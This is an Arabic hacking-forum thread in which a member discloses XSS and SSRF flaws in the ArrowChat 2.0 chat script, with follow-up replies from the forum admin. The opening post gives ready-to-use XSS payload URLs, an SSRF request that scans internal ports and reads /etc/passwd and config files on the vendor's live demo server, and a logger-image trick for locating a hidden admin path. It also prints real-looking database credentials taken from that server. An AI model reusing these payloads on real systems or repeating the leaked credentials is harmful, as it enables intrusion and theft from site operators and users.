الحماية للأبد -Security 4 Ever

الحماية للأبد -Security 4 Ever (https://www.sec4ever.com/home/index.php)
-   قسم جديد ثغرات الأعضاء (https://www.sec4ever.com/home/forumdisplay.php?f=60)
-   -   [شرح بالصور] SSRF (read internal files)+ XSS arrowchat 2.0 (https://www.sec4ever.com/home/showthread.php?t=19660)

alzher 07-10-2019 10:38 PM

SSRF (read internal files)+ XSS arrowchat 2.0
 
6 مرفق
\

السلام عليكم ورحمه الله وبركاته ..

\

الأب الروحي للمنتدى نسيم حب يحط سكربت شات للمنتدى اسمه arrowchat اول ما شفت السكربت ..

رحت ادور نسخه منزوعه بقوقل حصلت نسخه قديمه .. فقلت مالي الا افحص على موقع الشركة نفسها بما انها مركبه نسخه ديمو محدثه اخر اصدار ..


\

https://www.arrowchat.com

\

xss

الاصابه الاولى في ملف index.php

الاصدار رقم 1.0

كود PHP:

127.0.0.1/vb/arrowchat/public/video/index.php?rid=</s cript><s cript>al ert(xss);</sc ript

https://www.sec4ever.com/home/attach...1&d=1570483276

استغلال نفس الملف في الاصدار رقم 2.0

كود PHP:

https://www.site.com/arrowchat//public/video/index.php?rid="></ifra me><sc ript>ale rt(d ocument.dom ain)</sc ipt> 

الاصابه الثانيه رقم الاصدار 2.0 في ملف arrowchat/admin/forgot.php

https://www.arrowchat.com/demo.admin...min/forgot.php

نضع في خانه استعاده الايميل ..

كود PHP:

 "<xss><S cRiPt >a lert(1)</S cRiPt> 

https://www.sec4ever.com/home/attach...1&d=1570483280

\

ssrf

الاصابه الاولى .. اثناء المحادثه .. لاحظت ان الموقع يسمح لك بأرسال صور في الشات .. فقلت
what if i put my own logger image

نلاحظ ان المتغير message يرسل رابط صوره وتظهر للمستخدم .. تم تغير الرابط الى لوقر بصوره ..

https://www.sec4ever.com/home/attach...1&d=1570483283

نشوف النتايج ..

https://www.sec4ever.com/home/attach...1&d=1570483286

\

الاصابه الاخرى .. في ملف arrowchat/admin/includes/functions/functions_proxy_rss.php

نجرب

https://www.arrowchat.com/demo.admin...//127.0.0.1:21

بحيث كل ما تغير البورت يعطيك ريسبون بالبنر حقه واذا مو موجود يعطيك صفحه فاضيه ..

https://www.sec4ever.com/home/attach...1&d=1570483641

\

لقراءة ملفات السيرفر مع احترام المسار ..ddd

https://www.arrowchat.com/demo.admin...:///etc/passwd


https://www.sec4ever.com/home/attach...1&d=1570483689


لقراءة ملف الكونفيج ..

https://www.arrowchat.com/demo.admin...des/config.php


كود PHP:

     define('DB_SERVER','localhost');      define('DB_USERNAME','stackman_admin');      define('DB_PASSWORD','jTu46g_7');      define('DB_NAME','stackman_demoadmin'); 

\


\


طبعا لو فرضنا ان ملف الادمن مخفي مثل حالة شات منتدانا سابقاً .. نرسل لوقر على الشات العام ومتى ما دخل الادمن من اللوحه راح يبين مساره باللوقر .. ddddddddd



\


في امان الله

Sec4ever 08-10-2019 04:30 AM

رد: SSRF (read internal files)+ XSS arrowchat 2.0
 
شغل لوز يا alzher .
راح اعقب على الموضوع و اذا شايف ان الموضوع فيه معلومات حساسة حاول تحولوا على القسم الخاص لحين ما يعلق الاغلب على تاثير الموضوع .

alzher 08-10-2019 07:35 AM

رد: SSRF (read internal files)+ XSS arrowchat 2.0
 
اقتباس:

المشاركة الأصلية كتبت بواسطة Sec4ever (المشاركة 104115)
شغل لوز يا alzher .
راح اعقب على الموضوع و اذا شايف ان الموضوع فيه معلومات حساسة حاول تحولوا على القسم الخاص لحين ما يعلق الاغلب على تاثير الموضوع .




\


الوضع في السليم .. بالنسبة للوقر الشات .. قد جربته على شات المنتدى ولا ضبط .. اعتقد يحتاج تفعيل الخاصيه بلوحة الادمن للسماح بها ..


ملف functions_proxy_rss.php خلف مجلد الادمن وهو مخفي سابقا بالموقع ..


و التجارب كانت على موقع الشركة الام ..



\


وصدقني لو فيه ضرر على الموقع راسلتك فيه قبل ما انزل الموضوع .. حمايه واستمرار المنتدى مسئوليه الجميع ..




في امان الله

Sec4ever 11-10-2019 08:38 PM

رد: SSRF (read internal files)+ XSS arrowchat 2.0
 
الشات فيه هفوات كثيرة على الرغم من امكانياته الرائعة . حتى دوال الحماية فيه بدائية جدا .
مزلت مع حمزة و دكتور محمد لكي يعملوا لنا حماية جيدة.
اي شئ اتمنى ان يتم ارساله .


الساعة الآن 03:00 PM

Powered by vBulletin® Copyright ©2000 - 2019, Jelsoft Enterprises Ltd.